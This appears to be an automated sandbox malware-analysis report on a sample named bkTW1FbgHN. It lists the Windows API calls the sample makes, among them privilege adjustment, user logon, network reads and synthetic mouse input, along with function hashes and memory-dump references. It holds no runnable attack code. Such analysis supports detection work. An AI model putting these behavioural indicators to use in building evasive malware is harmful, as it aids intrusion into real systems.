Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 55fe5df23c1cda6055738db7ac9b2373169b03738bd5f6eec0d1ef15e11f54fe
Instruction ID: 2267c395687eef19863bd0d3ac08dc033c91b014f9a1df54836a2b579bca5f12
Opcode Fuzzy Hash: 55fe5df23c1cda6055738db7ac9b2373169b03738bd5f6eec0d1ef15e11f54fe
Instruction Fuzzy Hash: 55323775A007059FD728CF1AD481AAAB7F1FF48320B15C46EE89ADB3A1D770E941CB40

Function 010022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0100180A,00000000), ref: 010023E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01002418

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: db2ff84cceea0664d02b654b132223b778e571afabf9cdd938a11fd372f51fef
Instruction ID: 3a5db5ac8a07e5167f043d065de7de2dbd3b2a86564ec9f0be6c5f965cd5c0d6
Opcode Fuzzy Hash: db2ff84cceea0664d02b654b132223b778e571afabf9cdd938a11fd372f51fef
Instruction Fuzzy Hash: AF41E871904209BFFB22DE99DC89FBF77FCEB40714F0080AAF685A6181DB759E419A50

Function 00FFB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFB40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FFB465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FFB4B2

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 32379d9e542fdcce39772673ae4bdeb0ae2283d18933fcc316d69283254c24cb
Instruction ID: 5d602fa5ea7f1040739545889cb9ba32086a1374d47c280c33766f0313faf415
Opcode Fuzzy Hash: 32379d9e542fdcce39772673ae4bdeb0ae2283d18933fcc316d69283254c24cb
Instruction Fuzzy Hash: 99216D35A00108EFDB00EFA5DC80AEEBBB8FF49314F1480A9E945EB355DB359919DB50

Function 00FE87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
GetLastError.KERNEL32 ref: 00FE8865

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 52f7c3fe320a9edab5652940f7d27a0aa40a05aa43f64bfd5189f2938f0da4e1
Instruction ID: 926f61b4b6b541ee4231a49f9b2c56ec1a35d0a32a05d0eb7ed590a2bacf4a14
Opcode Fuzzy Hash: 52f7c3fe320a9edab5652940f7d27a0aa40a05aa43f64bfd5189f2938f0da4e1
Instruction Fuzzy Hash: C411B2B2804205AFD728EF55DC85D6BB7F8FB04350B10852EF49983241DF34BC018B60

Function 00FE874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FE878B
FreeSid.ADVAPI32(?), ref: 00FE879B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8365464a8d7a7fd15046fc547af38ff733adb4d19bb012596f78d40a73cc6997
Instruction ID: 70d1929a04987c32fd916d39e51135b4e7111df8e38fc4940f6c7475f0af4a3c
Opcode Fuzzy Hash: 8365464a8d7a7fd15046fc547af38ff733adb4d19bb012596f78d40a73cc6997
Instruction Fuzzy Hash: D1F04975A1130DBFDF00DFF4DD89AAEBBBCEF08211F1044A9A901E2180E6796A488B50

Function 00FF4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FF4CB3

Strings

DOWN, xrefs: 00FF4C98

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 4e22d78ad886f5eb69ebefbbdfdc17390226b2ff17a72037bc713c0b66c49489
Instruction ID: 8ed5365b76f0acdd556de5723766a5b9396c07d9a2e33f1c7bf0b43de7157730
Opcode Fuzzy Hash: 4e22d78ad886f5eb69ebefbbdfdc17390226b2ff17a72037bc713c0b66c49489
Instruction Fuzzy Hash: FEE08C7219D7223DB948291ABC03FF7278C8F12735B10125AFA50E94D1ED896C8239B8

Function 00FFC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFC6FB
FindClose.KERNEL32(00000000), ref: 00FFC72B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7c72034f8b32127f9936e56b4053ec585b7f615c198392af52a5d67178c46124
Instruction ID: 47323432674954ff2392a27b6678b803331b813befc46e8af93220f42da1b675
Opcode Fuzzy Hash: 7c72034f8b32127f9936e56b4053ec585b7f615c198392af52a5d67178c46124
Instruction Fuzzy Hash: 1A118E726046049FDB10EF29C845A6AF7E8EF85324F05851DF9A9C7291DB74A805DF81

Function 00FFA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01009468,?,0101FB84,?), ref: 00FFA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01009468,?,0101FB84,?), ref: 00FFA0A9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e208835b697b1c6bfe2f4cc074dc52e46516fc09f7b9d0b37a68e579f4ee9bc0
Instruction ID: d8c7a82c780d56292506e801a1276d9a9c26d2ab4f229d8921c3bc3a4714bc2e
Opcode Fuzzy Hash: e208835b697b1c6bfe2f4cc074dc52e46516fc09f7b9d0b37a68e579f4ee9bc0
Instruction Fuzzy Hash: 7FF0E23610422EABDB21AFA4DC48FEA736CBF08361F008156F908D3181DA349904DBA1

Function 00FE81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8309), ref: 00FE81E0
CloseHandle.KERNEL32(?,?,00FE8309), ref: 00FE81F2

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7551864630eb986a0f52261f0a8d77d87f521c02d804b40382c43e9fed402cc5
Instruction ID: 4e5fa0cc37fc6cdf383c9ba0ffd05343a5797b5b0697a06f6447d82c74641269
Opcode Fuzzy Hash: 7551864630eb986a0f52261f0a8d77d87f521c02d804b40382c43e9fed402cc5
Instruction Fuzzy Hash: 17E0E671010511AFE7253B61EC05D7777E9EF04350714891DF49584474DB6A9C91EB10

Function 00FBA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FB8D57,?,?,?,00000001), ref: 00FBA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FBA163

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cdacae2c5618557d1393d2f88768d501b482cd304f78aa070c0cc4cfa65fee63
Instruction ID: e0f05faf073ad3a3923c5e5fa775d51f840c21a8a3cee4904f5e6a61fdcae2c1
Opcode Fuzzy Hash: cdacae2c5618557d1393d2f88768d501b482cd304f78aa070c0cc4cfa65fee63
Instruction Fuzzy Hash: 71B0923105420AEBCA102B91E809B883F68FB44BAAF408010F64D84054CBEB54548B91

Function 00FBF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0babee5e4072b4fd2a1c4b026fe22e7e3e261562fc52b9663738700668724c
Instruction ID: 53bd9592f7ff4432dca94b3937199ae9bbe8d4e7fb57e07b62787f8ba2465e7e
Opcode Fuzzy Hash: 1b0babee5e4072b4fd2a1c4b026fe22e7e3e261562fc52b9663738700668724c
Instruction Fuzzy Hash: AA32F032D29F014DD7339939CC32325A248AFB73D4F25D737E85AB59AAEB29C4875600

Function 00FC242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d1a90634b24f20aa23999167c806d474d8e57c4cfc750f350ffe12c6186785
Instruction ID: e3d5df0a2bd2faccc562e70228cdb5381b483cb34452ddef89f061f040c74ed7
Opcode Fuzzy Hash: 63d1a90634b24f20aa23999167c806d474d8e57c4cfc750f350ffe12c6186785
Instruction Fuzzy Hash: 41B1FF30E2AF418DD2339A398931336B65CAFBB2D5F61D71BFC6671D16EB2685834240

Function 00FF8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00FF889B

Part of subcall function 00FB520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FF8F6E,00000000,?,?,?,?,00FF911F,00000000,?), ref: 00FB5213
Part of subcall function 00FB520A: __aulldiv.LIBCMT ref: 00FB5233

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 8e37dc06dd7939942c8f4ac0e9e1c9254aab2c6b0e82706b151e3ec0be17a233
Instruction ID: 8b39a9c94abf9e99442442b493ccf9c80505edb02ecf91d1297c98654fb42a2e
Opcode Fuzzy Hash: 8e37dc06dd7939942c8f4ac0e9e1c9254aab2c6b0e82706b151e3ec0be17a233
Instruction Fuzzy Hash: ED21A232A256108BC729CF25D441A62B3E1EFA5361F688E6CD1F5CB2D0CA39A905DB54

Function 00FE87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FE8389), ref: 00FE87D1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 84ebcd8fb24b9595508431e855afdfcd50c115fcc2541c820480c2dcfbb79701
Instruction ID: 122744b433ebcb08f95c47114d23e6face2e78a2f6a847968da9b02631f7128f
Opcode Fuzzy Hash: 84ebcd8fb24b9595508431e855afdfcd50c115fcc2541c820480c2dcfbb79701
Instruction Fuzzy Hash: F6D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C77AD835AF60

Function 00FBA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FBA12A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a4a9e3b56d92bbaa17f589da26803c894000140f5d4cb01504f2205dbd686e55
Instruction ID: 6f706cf793e105f839add71619735bbf3e003852f542974d1f45facf7aef3522
Opcode Fuzzy Hash: a4a9e3b56d92bbaa17f589da26803c894000140f5d4cb01504f2205dbd686e55
Instruction Fuzzy Hash: F4A0113000020EAB8A002A82E808888BFACEA002A8B008020F80C80022CBBBA8208A80

Function 00FA8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8d2c6dc37aa8e3c0db2c9c531f9d887630c404937dd660a04a37d1fbbcadb8
Instruction ID: 0ed82a3c1e8e352958e499665093274829ec5ef4f72635814a05378c4615452a
Opcode Fuzzy Hash: ee8d2c6dc37aa8e3c0db2c9c531f9d887630c404937dd660a04a37d1fbbcadb8
Instruction Fuzzy Hash: 862255B5D041869BDF388A15C49437D77A1FF067A8F28802BD982CB592DBB89C93F741

Function 00FB21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 2f5ed822d17f0e103269afd1918115b1a49a90c134168297aec8e531699cf1d7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D8C1A7326050930ADF6D463BC4741BEFBA16EA27B135E075DD4B3CB1D5EE10C925EA20

Function 00FB25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 0e77ea0d153a3893ba1cdcb30323aef248dbf4242fbc6a409bdde64ef8a06f4a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: AEC1973361519309DF6D463BC4341BEBBA16EA27B136A076DD4B3DB1D4EE20C925FA20

Function 00FB1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ba2fc4192f818ec6f2168880ad6d3f8d6be27ce53320feb63413de33eb0f2f8a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8EC1823271519309DF2D463BC4741BEBBA17EA27B139A076DD4B3CB1D4EE20D925EA20

Function 01BDB150 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 1a852acd05e6b455418e646e17d07ad0e481c8cf1dab6905b1305c18133dcad4
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9941C171D1051CEBCF48CFADC991AAEBBF2EF88201F548299D516AB345D730AB41DB80

Function 01BDAFE0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: debf6da966442474ee3072fdec54273f15c39bb35e6a4e31038d31d23491b63b
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: EC019278A00209EFCB49DF98C6909AEF7B5FB48310F2085D9D819A7301E731AE41DB80

Function 01BDB040 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID:
